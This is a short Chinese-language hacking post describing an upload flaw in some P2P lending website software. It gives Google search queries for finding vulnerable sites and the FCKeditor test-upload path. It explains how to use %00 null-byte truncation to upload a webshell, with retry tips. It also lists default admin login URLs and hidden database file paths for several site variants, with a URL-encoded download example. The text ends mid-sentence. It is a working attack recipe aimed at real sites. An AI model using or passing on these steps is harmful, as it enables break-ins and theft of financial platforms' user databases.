某p2p存在通用上传漏洞
google链接查找:
inurl:shouyi.asp
inurl:itemlist_xq.asp?id=
很多存在Fckeditor上传链接:
FCKeditor/editor/filemanager/connectors/uploadtest.html
抓包上传%00截断后发送就能获取shell
如果一次发送不行, 就发送多几次即可
如果多次发送同一数据包不行就把%00改成两个%00%00再截断送送一次或多次即可拿shell
通用后台与数据库下载:
后台: cpcms_admin\cplogin.asp 数据库: cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb 数据库: cp_data\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb 或 后台: ajcmsadmin\account.asp 数据库: ajcmsadmin\nnyylczccydata\#$ssjjb##17#654543534546$3$3.mdb 或 后台: ailangeadmin\account.asp 数据库: shujukuDSDFE489#$###789sdf\DS#@FCsad54534234433###\#$ssjjb##17#65454###23233534546$3$3.mdb
注意, 如果要下载数据库, 要把特殊字符转为url编码。
比如:
cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb 转码为: cp_data\cp_dsds%25%23%5e%26%40%21%64%61%61%61%5f%63%63%5c%23%24%73%73%6a%6a%62%23%23%31%37%23%36%35%26%26%5e%5f%5e%25%40%26%40%33%34%35%34%36%24%33%24%33%2e%6d%64%62
些种p2p界面型形如下: